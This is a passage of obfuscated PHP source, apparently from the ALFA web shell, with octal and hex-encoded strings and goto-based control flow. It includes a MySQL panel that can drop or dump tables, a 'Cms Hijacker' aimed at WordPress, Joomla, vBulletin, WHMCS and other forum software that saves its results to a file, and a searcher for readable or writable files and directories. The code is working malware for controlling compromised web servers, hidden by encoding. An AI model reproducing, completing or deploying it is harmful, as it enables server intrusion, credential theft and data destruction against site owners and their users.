$_POST["\163\x71\154\137\142\141\163\145"]) { $db->selectdb($_POST["\x73\161\154\137\142\141\163\145"]); $tbls_res = $db->listTables(); echo "\74\x75\x6c\76\74\x6c\151\x3e\x3c\x64\x69\x76\x20\143\x6c\141\x73\x73\75\x22\142\154\x6f\x63\x6b\x22\76\x3c\x69\76\74\x2f\151\x3e\x3c\x62\76\74\x2f\142\76\74\x2f\144\x69\166\76\74\x64\151\x76\76\74\x69\156\160\165\164\40\x73\164\171\x6c\x65\75\42\x70\x61\x64\144\x69\156\147\72\x20\x30\73\155\141\162\x67\151\x6e\55\x6c\145\146\x74\x3a\40\x31\61\x70\170\x3b\x74\145\170\x74\55\141\x6c\x69\x67\156\72\x63\145\156\x74\x65\x72\73\x22\40\x74\x79\160\x65\x3d\x22\164\145\170\x74\42\40\x63\x6c\141\163\163\x3d\42\144\x62\55\x6f\160\x74\55\x69\144\x22\40\x74\141\x72\x67\x65\x74\75\42\56\x63\154\x73\x2d" . $db_name . "\x22\x20\x70\x6c\141\143\145\x68\157\154\144\x65\162\x3d\x22\x46\x69\x6c\x74\145\x72\x20\x54\141\142\154\x65\x22\x20\x6f\156\153\x65\x79\165\x70\75\x22\141\x6c\x66\141\x4d\171\x73\161\154\x46\x69\154\164\x65\x72\124\x61\142\154\145\x28\x74\x68\151\x73\51\73\x22\x20\156\x61\155\x65\x3d\42\x66\151\154\x74\145\162\42\76\x3c\57\x64\151\166\76\74\x2f\x6c\151\76"; while ($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if (!empty($_POST["\163\161\x6c\137\x63\x6f\165\x6e\164"])) { $n = $db->fetch($db->query("\123\105\x4c\105\103\x54\x20\x43\117\125\116\124\x28\52\x29\40\141\x73\40\x6e\40\x46\122\x4f\115\x20\140" . $value . "\140")); } $value = htmlspecialchars($value); echo "\x3c\154\151\76\x3c\144\151\x76\x20\x63\154\x61\163\x73\x3d\47\142\x6c\x6f\x63\x6b\47\76\x3c\x69\76\74\57\x69\x3e\x3c\x62\x3e\74\57\x62\76\74\57\x64\151\166\x3e\x3c\x64\x69\x76\x20\143\154\141\x73\163\75\x27\x74\141\142\x6c\145\x73\55\x72\157\x77\47\76\74\x69\x6e\160\165\164\x20\164\171\160\x65\x3d\47\143\150\145\143\153\x62\x6f\170\47\x20\156\x61\x6d\x65\75\47\164\x62\154\x5b\135\x27\x20\166\x61\154\165\x65\75\47" . $value . "\47\76\x26\x6e\142\163\160\x3b\x3c\141\x20\x63\x6c\141\x73\163\x3d\x27\x64\142\55\x6f\160\x74\55\151\144\47\40\x64\142\x5f\164\x61\162\147\145\164\x3d\x27" . $db_name . "\47\x20\150\x72\x65\x66\x3d\47\x6a\141\x76\141\163\143\x72\151\x70\x74\72\166\x6f\151\x64\50\60\51\x3b\47\x20\157\156\143\154\151\x63\x6b\x3d\42\x61\154\x66\x61\114\x6f\x61\144\124\x61\x62\x6c\x65\104\x61\x74\x61\50\x74\x68\x69\x73\x2c\47" . $value . "\47\x29\42\x3e\74\x73\x70\x61\x6e\40\x63\154\x61\x73\x73\75\x27\x6d\171\163\x71\x6c\x5f\164\141\142\x6c\145\163\x27\x20\163\164\x79\154\145\75\x27\x66\157\156\x74\x2d\x77\x65\x69\147\150\x74\x3a\165\156\163\x65\x74\x3b\47\76" . $value . "\74\57\163\x70\x61\156\76\74\x2f\141\x3e" . (empty($_POST["\163\x71\154\x5f\143\157\165\156\164"]) ? "\x26\156\142\x73\160\x3b" : "\40\74\x73\x6d\141\154\x6c\76\x3c\163\x70\x61\x6e\x20\x73\164\171\154\x65\75\x27\x66\x6f\156\164\x2d\167\145\x69\x67\150\164\72\165\156\163\x65\164\x3b\x27\x20\143\x6c\x61\x73\x73\75\x27\155\171\x73\x71\154\137\164\141\x62\154\145\x5f\143\157\x75\156\x74\47\x3e\x28{$n["\156"]}\51\74\57\x73\160\x61\x6e\76\74\x2f\x73\155\141\154\154\76") . "\74\x2f\x64\151\x76\x3e\x3c\x2f\154\x69\x3e"; } echo "\74\57\165\154\x3e\74\144\x69\x76\40\163\x74\x79\x6c\145\x3d\x22\x6d\x61\x72\147\x69\156\55\x6c\145\146\164\x3a\x20\x32\66\x70\x78\73\155\x61\x72\147\x69\x6e\55\142\157\164\x74\157\x6d\72\40\x31\x30\160\170\73\x6d\x61\x72\147\x69\x6e\55\x74\157\160\x3a\x20\61\x30\160\170\x3b\42\76\x3c\x69\x6e\160\x75\x74\40\157\x6e\143\150\141\x6e\147\145\75\x22\x61\154\146\x61\x4d\171\x73\161\x6c\x54\x61\142\154\x65\163\105\166\151\x6c\50\164\x68\x69\x73\x29\73\42\x20\x63\154\x61\163\x73\x3d\42\x64\142\55\157\x70\164\55\x69\144\x22\40\x74\141\x72\147\x65\164\x3d\x22\x2e\x63\x6c\x73\x2d" . $db_name . "\42\x20\164\x79\x70\145\75\42\143\x68\145\x63\153\142\157\x78\x22\40\x63\154\141\x73\163\x3d\x22\x64\x62\55\157\x70\x74\x2d\151\x64\42\x3e\74\163\x65\x6c\145\x63\x74\x20\x6f\x6e\x63\150\141\156\147\x65\x3d\x22\141\x6c\146\141\115\171\163\x71\x6c\124\x61\x62\x6c\x65\163\104\x75\155\160\x44\162\157\160\50\164\x68\151\163\x29\x3b\42\x20\x63\154\x61\163\x73\75\42\x64\142\x2d\x6f\160\x74\55\151\x64\x22\x20\x74\141\162\147\145\x74\75\x22\56\x63\x6c\163\x2d" . $db_name . "\42\x20\x63\x6c\141\x73\x73\75\x22\x64\x62\x2d\x6f\x70\x74\x2d\151\144\42\40\x6e\141\155\x65\75\42\x74\141\142\x6c\x65\x73\x5f\145\x76\x69\x6c\42\40\x73\x74\171\154\145\x3d\42\x70\141\x64\144\151\156\x67\72\40\x30\73\167\151\144\164\150\72\40\x31\x30\60\160\x78\73\x22\76\74\157\x70\164\x69\x6f\156\40\x73\x65\x6c\x65\x63\x74\145\x64\76\x64\162\157\160\x3c\x2f\157\160\x74\x69\157\156\x3e\74\x6f\x70\164\151\157\x6e\76\x64\x75\x6d\x70\x3c\57\157\160\164\151\x6f\156\x3e\74\57\163\x65\x6c\145\143\164\76\x20\74\x62\x75\164\164\x6f\156\x20\x6f\156\x63\x6c\x69\143\153\75\x22\141\154\x66\x61\115\171\x73\x71\154\x54\141\142\x6c\x65\x73\104\165\155\x70\104\162\157\160\102\164\156\x28\164\x68\151\x73\x29\73\x72\145\x74\165\x72\156\40\146\x61\154\163\145\x3b\x22\40\x63\154\x61\x73\163\75\x22\x64\x62\55\157\160\164\55\x69\144\42\x20\144\x62\137\164\141\162\x67\x65\x74\x3d\x22" . $db_name . "\x22\40\x74\x61\162\x67\x65\x74\x3d\42\x2e\x63\154\x73\x2d" . $db_name . "\x22\40\143\x6c\x61\x73\x73\x3d\x22\144\142\x2d\x6f\x70\x74\55\x69\x64\x22\x3e\104\x6f\x20\x69\164\x3c\57\142\165\x74\164\x6f\x6e\x3e\x3c\x64\x69\x76\40\143\154\x61\x73\x73\x3d\42\144\165\x6d\160\55\146\x69\x6c\x65\x2d\x68\157\x6c\144\145\x72\42\x20\163\164\171\154\x65\x3d\42\144\151\163\x70\154\141\x79\72\156\157\x6e\145\73\x6d\x61\162\147\x69\x6e\55\154\x65\146\x74\x3a\62\60\x70\170\73\155\x61\x72\147\151\156\x2d\164\x6f\x70\72\x20\x35\x70\170\73\x22\76\74\x69\156\160\165\x74\x20\163\x74\171\154\145\x3d\x22\x70\141\x64\x64\x69\x6e\x67\x3a\x20\x30\x3b\164\x65\170\x74\x2d\x61\154\x69\x67\x6e\x3a\x63\x65\x6e\164\145\x72\x3b\x22\x20\164\171\x70\145\75\42\x74\145\x78\164\x22\40\x70\x6c\x61\143\145\150\157\154\x64\x65\162\75\42\144\x75\155\160\x2e\x73\161\x6c\x22\x20\x6e\141\x6d\x65\75\42\x64\165\x6d\x70\137\146\x69\154\x65\42\x3e\x3c\x2f\144\151\x76\x3e\74\x2f\144\151\x76\x3e"; } echo "\74\x2f\x64\151\x76\76\74\x2f\154\151\76"; } echo "\x3c\57\165\154\x3e\x3c\x2f\x64\x69\166\76\74\x64\x69\166\x20\x63\x6c\141\163\x73\75\47\x6d\171\x73\161\154\x2d\161\165\145\x72\171\x2d\x72\145\x73\x75\x6c\x74\x73\x27\x3e\74\144\151\x76\x20\143\x6c\x61\x73\x73\x3d\47\x6d\x79\163\161\154\x2d\x71\165\x65\162\171\55\x72\145\163\x75\154\x74\x2d\164\x61\142\163\x27\76\74\144\151\x76\40\x63\154\141\x73\163\x3d\x27\144\x62\x2d\x6f\x70\x74\55\x69\144\40\155\x79\163\161\x6c\x2d\x71\165\145\x72\171\55\163\145\154\x65\x63\164\x65\x64\55\164\141\142\x27\x20\x74\x61\x72\147\145\164\x3d\x27\x2e\155\x79\163\x71\x6c\x2d\x71\x75\145\162\171\x2d\x72\x65\x73\x75\x6c\x74\x2d\143\x6f\x6e\164\145\156\164\x27\x20\x6f\156\x63\x6c\151\x63\153\75\47\x61\x6c\146\141\115\171\x73\161\154\124\141\142\103\164\154\50\164\x68\x69\x73\x29\x3b\47\x3e\x52\x65\163\x75\154\x74\x3c\57\x64\151\x76\x3e\x3c\144\151\166\x20\x63\154\x61\163\163\x3d\47\x64\142\x2d\157\x70\x74\55\151\x64\x27\40\x74\141\x72\x67\145\x74\75\47\56\155\171\163\x71\154\55\x71\x75\145\x72\171\x2d\146\x6f\x72\155\x27\40\157\x6e\143\154\151\143\x6b\x3d\x27\141\154\146\x61\x4d\171\x73\x71\x6c\x54\141\142\x43\164\154\x28\x74\x68\151\163\51\x3b\x27\x3e\121\x75\145\x72\171\74\57\144\151\x76\x3e\x3c\x64\x69\166\40\x63\x6c\141\163\163\75\47\x64\x62\55\157\160\x74\55\x69\x64\47\x20\x74\x61\x72\x67\145\164\x3d\x27\x2e\x6d\x79\163\x71\x6c\x2d\163\x65\141\162\x63\150\x2d\141\x72\145\141\x27\40\157\156\143\154\151\x63\x6b\x3d\x27\x61\x6c\146\141\115\x79\163\161\154\x54\141\x62\103\164\x6c\x28\x74\x68\x69\163\x29\x3b\x27\x3e\123\145\141\x72\143\150\74\57\x64\x69\x76\x3e\74\144\x69\166\40\143\x6c\x61\163\x73\x3d\47\144\x62\55\157\x70\164\x2d\151\x64\47\40\164\141\x72\147\145\x74\x3d\47\x2e\155\171\x73\x71\x6c\x2d\x73\x74\162\165\143\164\x75\x72\x65\47\40\x6f\x6e\143\154\x69\x63\x6b\75\x27\x61\x6c\146\141\115\x79\163\x71\x6c\x54\141\142\x43\x74\x6c\x28\164\150\x69\163\51\73\47\76\x53\164\162\x75\143\164\165\x72\x65\74\x2f\x64\x69\x76\76\x3c\x64\151\x76\40\143\x6c\x61\x73\163\x3d\47\144\142\55\x6f\x70\164\x2d\x69\x64\x27\40\164\x61\162\x67\145\x74\x3d\47\56\155\171\x73\x71\154\x2d\x69\x6e\163\x65\x72\x74\x2d\162\x6f\x77\47\x20\x6f\x6e\143\154\151\143\x6b\x3d\x27\x61\x6c\x66\141\115\x79\163\x71\154\124\141\x62\103\x74\x6c\x28\x74\150\151\163\x29\73\x27\x3e\x49\156\x73\x65\162\x74\74\57\144\x69\x76\76\x3c\x64\151\166\40\x73\164\171\154\145\x3d\47\x64\151\x73\160\154\x61\171\72\x6e\x6f\x6e\x65\73\47\40\143\x6c\141\x73\x73\75\x27\144\x62\x2d\157\160\x74\55\x69\x64\47\x20\164\141\x72\x67\x65\x74\75\47\x2e\x6d\x79\163\x71\x6c\55\145\x64\151\x74\x2d\x72\x6f\x77\x27\x20\157\156\x63\154\x69\143\x6b\75\x27\141\x6c\x66\x61\115\x79\x73\161\154\x54\141\x62\x43\x74\154\50\164\x68\x69\163\51\73\47\76\105\x64\x69\x74\74\57\x64\x69\166\x3e\74\x2f\x64\151\166\x3e\74\x64\x69\x76\40\143\x6c\141\x73\163\75\47\155\x79\x73\x71\x6c\x2d\x71\x75\x65\162\171\55\x63\157\156\164\x65\x6e\x74\40\x6d\171\x73\161\154\x2d\151\x6e\163\x65\x72\164\x2d\162\x6f\167\40\x6d\171\163\x71\154\55\x68\x69\x64\145\55\143\x6f\156\x74\145\156\x74\47\x3e\x3c\57\144\x69\166\76\74\144\x69\166\40\x63\x6c\141\x73\163\75\47\x6d\x79\163\x71\x6c\x2d\161\x75\145\x72\x79\x2d\143\157\156\x74\x65\x6e\164\x20\155\171\x73\x71\x6c\x2d\145\144\x69\x74\x2d\162\x6f\x77\40\155\171\x73\x71\x6c\55\150\151\x64\145\55\x63\157\x6e\x74\x65\x6e\164\x27\76\x3c\57\x64\151\x76\x3e\74\x64\151\x76\40\x63\154\141\x73\x73\75\47\155\171\x73\161\154\x2d\161\x75\145\162\x79\55\x63\x6f\x6e\164\145\x6e\164\40\155\171\x73\161\x6c\x2d\x73\x65\x61\x72\x63\x68\55\141\162\145\141\x20\x6d\171\x73\x71\154\55\x68\x69\144\x65\x2d\x63\x6f\x6e\x74\145\156\x74\47\76\x3c\x2f\x64\151\166\76\74\x64\x69\x76\40\143\x6c\x61\x73\x73\x3d\x27\155\171\x73\x71\x6c\x2d\161\165\145\162\x79\x2d\x63\x6f\156\x74\x65\156\164\40\x6d\x79\x73\x71\x6c\x2d\163\164\162\165\143\164\x75\x72\145\x20\155\171\x73\x71\154\55\150\151\x64\145\x2d\x63\x6f\x6e\164\x65\156\x74\47\76\74\x2f\x64\151\166\x3e\x3c\x64\151\x76\x20\x63\x6c\141\163\163\75\x27\155\x79\163\161\154\x2d\161\x75\145\162\x79\55\x63\157\x6e\164\145\156\x74\x20\155\171\x73\161\154\x2d\161\x75\x65\x72\171\x2d\x66\157\162\155\x20\x6d\171\163\161\154\x2d\x68\x69\144\x65\x2d\x63\157\x6e\x74\145\156\x74\x27\x3e\74\144\x69\x76\x20\163\x74\171\x6c\145\75\47\155\141\x72\x67\151\156\x2d\x62\157\164\164\157\155\x3a\40\65\x70\x78\73\47\x3e\x3c\163\160\x61\x6e\76\x51\x75\145\162\x79\x3a\x3c\x2f\163\x70\141\x6e\x3e\x3c\57\x64\151\x76\76\x3c\164\145\170\x74\141\162\x65\141\x20\x6e\141\155\145\75\47\161\x75\x65\162\171\x27\x20\x73\x74\x79\x6c\x65\75\x27\167\151\x64\x74\150\72\71\60\x25\x3b\150\x65\151\147\150\x74\72\x31\x30\x30\160\170\x27\x3e\x3c\57\164\x65\170\164\141\162\145\141\x3e\x3c\x70\x3e\x3c\x64\151\x76\40\x73\164\x79\154\145\75\x27\146\154\x6f\x61\x74\x3a\x6c\x65\146\x74\x3b\155\141\x72\147\151\x6e\x2d\154\x65\x66\x74\72\40\x33\60\x70\x78\73\x27\76\74\x69\x6e\x70\165\164\x20\143\x6c\141\x73\x73\75\x27\x62\165\x74\x74\x6f\x6e\x20\144\x62\x2d\x6f\160\164\55\151\144\47\40\144\142\137\x74\141\x72\147\145\x74\75\47" . $_POST["\163\161\154\137\x62\141\163\145"] . "\47\40\x6f\156\143\154\x69\x63\x6b\75\x27\x61\x6c\146\x61\115\x79\163\x71\154\x51\165\x65\x72\171\50\x74\150\151\x73\51\x3b\162\145\x74\x75\162\x6e\40\x66\x61\154\x73\145\x3b\x27\x20\164\171\160\x65\75\x27\163\165\x62\155\x69\x74\x27\40\166\141\x6c\x75\145\75\x27\40\47\76\x3c\57\x64\x69\166\x3e\x3c\57\x70\x3e\x3c\x2f\144\x69\x76\x3e\x3c\144\151\166\40\x63\154\141\x73\163\75\x27\155\171\x73\161\x6c\55\x71\165\145\x72\x79\55\x63\157\x6e\x74\x65\156\164\x20\x6d\171\163\x71\154\x2d\x71\x75\145\162\x79\x2d\x72\x65\x73\x75\154\164\55\143\x6f\x6e\164\145\x6e\164\47\x3e\74\x64\x69\x76\40\143\154\x61\163\x73\75\47\x6d\171\163\x71\154\x2d\x71\x75\145\162\171\x2d\162\x65\x73\165\x6c\x74\x2d\150\145\x61\x64\x65\162\47\x3e\x3c\x64\x69\x76\x20\x73\x74\171\154\x65\75\x27\155\141\x72\147\x69\x6e\55\x62\157\x74\x74\157\x6d\x3a\x20\x31\60\160\x78\x3b\47\40\x63\154\x61\x73\163\75\x27\155\171\x73\161\x6c\x2d\x71\165\145\x72\171\x2d\162\x65\x70\157\162\164\x65\x72\47\76\x3c\x2f\144\151\x76\76\x3c\144\151\166\x20\x63\154\x61\163\163\x3d\x27\155\171\x73\161\x6c\x2d\161\165\x65\x72\x79\55\160\141\147\145\x72\47\x3e\74\x2f\x64\151\166\x3e\x3c\x2f\x64\151\x76\x3e\74\144\151\166\x20\x63\x6c\141\163\x73\75\x27\x6d\x79\163\161\x6c\55\161\165\x65\x72\x79\x2d\164\x61\x62\x6c\x65\x27\76\74\57\x64\151\x76\76\x3c\57\x64\x69\166\x3e\x3c\x2f\x66\x6f\162\155\76\74\x2f\x74\x64\x3e\74\x2f\x74\162\x3e"; } echo "\74\x2f\x74\141\x62\x6c\145\76\x3c\x2f\x64\151\166\76"; echo "\74\57\144\151\x76\x3e"; } else { echo htmlspecialchars($db->error()); } echo "\74\57\144\151\166\x3e"; alfafooter(); } goto W3QA9; CQ4Ti: function alfacheckfiletype() { $path = $_POST["\x70\141\x74\x68"]; $arg = $_POST["\x61\x72\x67"]; if (@is_file($path . "\x2f" . $arg)) { echo "\x66\x69\154\145"; } else { echo "\x64\151\x72"; } } goto Gw1Wi; UCtms: function alfacmshijacker() { alfahead(); AlfaNum(5, 6, 7, 8, 9, 10); echo "\74\x64\x69\166\40\143\x6c\x61\x73\x73\75\150\145\141\x64\145\162\x3e\x3c\x62\x72\x3e\12\74\143\x65\156\x74\145\162\x3e\74\144\151\166\x20\x63\154\x61\163\x73\x3d\42\164\x78\x74\x66\157\x6e\x74\x5f\x68\x65\141\x64\145\162\x22\76\174\x20\x43\155\163\40\110\151\x6a\x61\x63\x6b\145\162\40\x7c\74\57\x64\151\x76\x3e\x3c\142\162\76\x3c\x62\x72\76\74\x66\157\162\155\x20\x6f\x6e\x53\165\x62\155\x69\164\x3d\42\147\50\47\143\155\163\x68\151\152\141\143\153\145\162\x27\x2c\156\165\x6c\x6c\x2c\164\x68\151\163\56\x63\155\x73\x68\151\x2e\166\x61\x6c\x75\145\54\164\150\151\x73\56\163\141\x76\x65\164\x6f\x2e\166\141\154\x75\x65\54\47\x3e\76\x27\54\164\x68\x69\163\56\143\x6d\x73\160\x61\x74\150\x2e\x76\141\x6c\165\145\51\73\162\145\164\x75\x72\x6e\x20\146\x61\x6c\x73\x65\x3b\42\x20\155\x65\x74\x68\157\x64\75\x27\160\x6f\163\x74\x27\x3e\xa\x3c\x64\151\166\40\x63\154\141\163\x73\75\42\x74\x78\x74\146\x6f\x6e\164\42\x3e\103\115\123\72\40\x3c\x73\145\154\x65\x63\x74\x20\163\164\x79\x6c\x65\75\x22\x77\x69\144\x74\150\x3a\x31\60\x30\160\x78\73\42\x20\156\141\155\145\75\42\x63\x6d\163\150\151\42\x3e"; $cm_array = array("\x76\x62" => "\166\x42\165\x6c\154\145\x74\x69\156", "\x77\x70" => "\167\157\162\144\x70\x72\x65\x73\163", "\x6a\157\155" => "\x6a\157\157\x6d\154\141", "\167\150\155\143\163" => "\x77\150\x6d\143\x73", "\155\171\142\x62" => "\x6d\171\x62\x62", "\x69\160\x62" => "\151\x70\142\157\141\x72\144", "\160\x68\x70\142\142" => "\x70\x68\x70\142\x62"); foreach ($cm_array as $key => $val) { echo "\74\157\x70\164\151\x6f\156\x20\166\141\x6c\165\x65\x3d\42" . $key . "\42\x3e" . $val . "\74\57\157\x70\164\x69\157\156\76"; } echo "\74\57\x73\x65\154\x65\143\164\76"; echo "\x20\x50\x61\x74\x68\x20\151\156\163\164\x61\x6c\x6c\x65\x64\x20\x63\155\x73\72\40\x3c\x69\x6e\x70\165\164\40\163\151\x7a\x65\x3d\x22\x35\x30\x22\40\x74\171\160\145\x3d\42\164\145\x78\164\x22\x20\x6e\x61\x6d\x65\x3d\42\143\x6d\163\160\x61\x74\150\x22\x20\160\154\141\x63\145\x68\x6f\x6c\144\145\x72\75\42\145\170\x3a\40\x2f\150\157\155\145\57\165\163\145\162\x2f\160\165\x62\x6c\x69\x63\137\x68\x74\155\x6c\x2f\x76\x62\165\x6c\x6c\x65\x74\x69\156\x2f\x22\x3e\12\123\141\166\x65\x54\x6f\x3a\40\74\151\x6e\160\x75\164\40\x73\151\172\145\75\42\65\x30\42\40\164\171\x70\145\75\x22\x74\145\x78\164\42\x20\156\141\155\x65\75\42\163\141\166\145\x74\157\42\40\166\x61\154\x75\145\75\42" . $GLOBALS["\143\167\x64"] . "\141\x6c\x66\141\56\x74\170\x74\x22\76\x3c\57\146\x6f\x6e\x74\76\xa\74\151\156\x70\x75\x74\x20\x74\x79\x70\145\75\42\x73\165\142\155\151\164\x22\40\156\141\155\x65\x3d\x22\142\x74\x6e\x22\40\x76\141\154\165\x65\75\42\x20\42\x3e\74\57\146\x6f\162\155\x3e\74\57\x63\145\x6e\x74\x65\162\x3e\x3c\142\x72\x3e"; $cms = $_POST["\x61\x6c\146\x61\61"]; $saveto = $_POST["\x61\x6c\146\141\x32"]; $cmspath = $_POST["\141\154\146\141\x34"]; if (!empty($cms) and !empty($saveto) and $_POST["\x61\154\146\141\64"] and $_POST["\141\x6c\146\x61\x33"] == "\76\76") { echo __pre(); alfaHijackCms($cms, $cmspath, $saveto); } echo "\x3c\57\144\x69\166\x3e"; alfafooter(); } goto Gg7XK; IJ5CO: if (!function_exists("\152\163\157\156\x5f\x65\156\x63\157\x64\145")) { function json_encode($a = false) { if (is_null($a)) { return "\x6e\x75\154\154"; } if ($a === false) { return "\146\x61\x6c\163\x65"; } if ($a === true) { return "\x74\162\x75\x65"; } if (is_scalar($a)) { if (is_float($a)) { return floatval(str_replace("\x2c", "\x2e", strval($a))); } if (is_string($a)) { static $jsonReplaces = array(array("\x5c", "\57", "\xa", "\x9", "\xd", "\x5c\x62", "\14", "\42"), array("\x5c\134", "\134\x2f", "\x5c\156", "\134\164", "\x5c\162", "\x5c\142", "\x5c\146", "\134\x22")); return "\x22" . str_replace($jsonReplaces[0], $jsonReplaces[1], $a) . "\x22"; } else { return $a; } } $isList = true; for ($i = 0, reset($a); $i < count($a); $i++, next($a)) { if (key($a) !== $i) { $isList = false; break; } } $result = array(); if ($isList) { foreach ($a as $v) { $result[] = json_encode($v); } return "\x5b" . join("\54", $result) . "\135"; } else { foreach ($a as $k => $v) { $result[] = json_encode($k) . "\72" . json_encode($v); } return "\x7b" . join("\54", $result) . "\x7d"; } } } goto BQm_p; jL3tA: if (!function_exists("\x73\171\x73\137\147\x65\x74\137\x74\x65\155\160\137\x64\151\162")) { function sys_get_temp_dir() { foreach (array("\x54\115\120", "\x54\x45\115\x50", "\x54\115\120\x44\111\x52") as $env_var) { if ($temp = getenv($env_var)) { return $temp; } } $temp = tempnam($GLOBALS["\137\x5f\x66\151\x6c\x65\x5f\x70\141\164\150"], ''); if (_alfa_file_exists($temp, false)) { unlink($temp); return dirname($temp); } return null; } } goto dptXn; qa1jm: function alfasearcher() { alfahead(); echo "\x3c\x64\x69\x76\40\x63\x6c\141\163\x73\x3d\x68\x65\141\x64\145\162\76\74\x63\145\156\x74\x65\162\x3e\x3c\x70\76\x3c\x64\151\166\40\143\x6c\x61\x73\163\x3d\x22\x74\x78\x74\x66\157\x6e\x74\x5f\150\145\141\144\x65\162\x22\76\x7c\x20\123\145\x61\162\x63\150\x65\x72\40\174\74\57\144\x69\166\x3e\74\57\x70\76\74\x68\x33\76\74\x61\40\x68\x72\145\x66\x3d\x6a\141\166\x61\x73\x63\162\x69\x70\x74\72\x76\157\151\144\50\x30\x29\40\157\x6e\x63\154\151\143\x6b\75\x22\x67\50\47\x73\145\141\162\x63\x68\145\162\x27\54\156\165\x6c\x6c\54\47\x66\x69\154\145\47\x29\x22\x3e\x7c\x20\x46\151\156\144\x20\122\145\x61\144\x61\142\154\x65\x20\117\x72\40\x57\162\151\x74\141\142\x6c\145\40\106\151\x6c\x65\163\40\x7c\40\x3c\x2f\x61\76\74\x61\40\150\162\x65\146\75\152\x61\166\x61\163\143\162\151\160\164\72\x76\157\x69\144\x28\x30\51\40\x6f\156\x63\x6c\x69\143\x6b\75\x22\x67\x28\47\x73\x65\x61\x72\143\150\x65\x72\x27\54\x6e\165\x6c\x6c\54\47\163\x74\162\x27\x29\42\76\x7c\40\x46\151\x6e\x64\x20\x46\x69\x6c\145\x73\x20\102\171\x20\116\x61\x6d\x65\40\174\x20\x3c\57\141\76\x3c\x2f\150\x33\76\x3c\x2f\143\x65\156\164\x65\x72\x3e"; if (isset($_POST["\x61\154\x66\141\x31"]) && $_POST["\x61\x6c\146\141\x31"] == "\x66\151\x6c\145") { echo "\74\143\x65\156\x74\x65\x72\76\x3c\x64\151\166\x20\x63\154\x61\x73\163\75\x22\164\170\x74\146\x6f\156\164\x5f\150\x65\x61\x64\x65\x72\42\76\x7c\40\106\x69\x6e\144\40\122\145\x61\144\x61\x62\154\145\40\117\x72\40\x57\162\151\x74\141\x62\154\x65\40\x46\x69\x6c\145\163\x20\x20\x7c\x3c\x2f\144\x69\x76\x3e\x3c\142\162\76\74\142\162\x3e\74\146\x6f\x72\x6d\x20\156\141\155\145\75\42\163\x72\x63\150\x22\x20\x6f\x6e\x53\x75\142\155\151\164\75\x22\147\50\x27\163\x65\141\x72\x63\150\145\162\47\x2c\156\165\x6c\x6c\x2c\x27\146\x69\x6c\145\x27\x2c\164\x68\x69\x73\56\146\x69\x6c\145\x6e\141\x6d\x65\56\166\x61\x6c\x75\145\54\164\x68\151\163\56\145\x78\x74\56\x76\141\x6c\x75\145\x2c\x74\x68\151\x73\56\155\145\164\x68\x6f\144\56\166\141\x6c\x75\x65\x2c\x27\x3e\x3e\x27\x29\x3b\x72\145\x74\165\x72\x6e\x20\x66\x61\x6c\163\145\73\x22\40\155\x65\164\150\x6f\144\75\x27\x70\x6f\163\164\x27\x3e\xa\74\144\x69\166\x20\143\x6c\x61\163\x73\75\x22\x74\170\164\146\157\156\x74\x22\x3e\12\x4d\x65\x74\x68\157\144\x3a\x20\x3c\163\x65\154\145\x63\x74\40\x73\x74\171\154\145\75\x22\167\151\144\164\150\72\40\61\70\45\73\x22\x20\157\156\143\154\151\x63\x6b\x3d\42\141\x6c\146\141\x5f\x73\145\x61\x72\143\x68\145\162\x5f\164\x6f\x6f\154\x28\164\150\x69\x73\x2e\166\141\x6c\165\x65\x29\73\42\40\156\141\x6d\x65\75\x22\x6d\145\x74\x68\157\x64\x22\x3e\74\x6f\x70\x74\151\x6f\156\40\x76\141\x6c\x75\x65\x3d\x22\146\x69\154\145\163\x22\x3e\106\x69\x6e\144\x20\x41\x6c\x6c\x20\x57\x72\151\x74\141\142\154\145\x20\106\151\154\145\163\74\x2f\157\x70\164\x69\x6f\156\x3e\x3c\157\x70\x74\x69\x6f\x6e\x20\166\141\154\x75\145\75\42\144\x69\x72\163\x22\x3e\x46\x69\x6e\x64\40\x41\x6c\x6c\x20\127\162\151\x74\x61\142\154\145\40\104\x69\x72\163\74\x2f\x6f\x70\164\x69\x6f\156\76\x3c\x6f\160\x74\151\157\156\x20\x76\x61\154\165\145\x3d\42\x61\x6c\x6c\x22\x3e\106\151\156\144\40\x41\154\154\x20\x52\x65\141\144\141\142\154\x65\40\x41\156\x64\x20\127\x72\151\x74\x61\x62\x6c\x65\40\x46\151\x6c\x65\x73\x3c\x2f\157\x70\x74\151\157\x6e\x3e\74\57\163\145\x6c\x65\143\164\x3e\12\x44\x69\x72\x3a\40\x3c\x69\156\x70\165\x74\x20\x73\x69\x7a\145\x3d\x22\65\x30\x22\40\x69\x64\75\x22\164\x61\162\147\x65\164\42\x20\164\x79\160\x65\75\42\164\145\x78\164\x22\x20\156\x61\155\x65\75\x22\x66\151\x6c\x65\156\x61\x6d\x65\42\40\166\141\x6c\x75\145\75\x22" . $GLOBALS["\x63\167\144"] . "\x22\76\12\105\x78\164\x3a\40\74\x73\x6d\x61\154\154\76\74\x66\157\x6e\164\40\143\157\154\157\x72\75\x22\x72\x65\x64\42\76\133\x20\x2a\40\75\40\x61\154\x6c\x20\105\170\x74\x20\x5d\x3c\x2f\146\x6f\x6e\164\x3e\74\57\163\155\x61\x6c\154\x3e\x20\x3c\151\x6e\x70\165\164\x20\x69\144\75\x22\x65\x78\x74\42\x20\163\164\171\x6c\145\75\x22\x74\x65\x78\164\x2d\141\x6c\x69\x67\x6e\72\x63\145\156\x74\x65\x72\73\x22\40\164\171\160\145\75\42\x74\145\x78\x74\x22\40\x6e\141\155\x65\75\x22\x65\x78\164\42\x20\x73\x69\172\145\75\42\65\x22\x20\x76\x61\x6c\165\x65\x3d\42\x70\x68\160\x22\76\12\x3c\x69\156\x70\165\164\x20\x74\x79\160\x65\75\x22\163\x75\142\x6d\x69\x74\42\x20\156\x61\155\145\x3d\42\142\164\156\42\x20\166\141\154\x75\145\75\42\40\42\76\x3c\57\x64\x69\166\x3e\74\x2f\146\x6f\162\x6d\76\x3c\57\x63\145\x6e\x74\145\162\x3e\x3c\x62\162\x3e"; $dir = $_POST["\141\x6c\x66\141\62"]; $ext = $_POST["\x61\x6c\146\141\63"]; $method = $_POST["\141\154\146\141\x34"]; if ($_POST["\141\154\146\141\x35"] == "\76\76") { echo __pre(); if (substr($dir, -1) == "\x2f") { $dir = substr($dir, 0, -1); } Alfa_Searcher($dir, trim($ext), $method); } } if ($_POST["\x61\154\146\x61\x31"] == "\x73\164\162") { echo 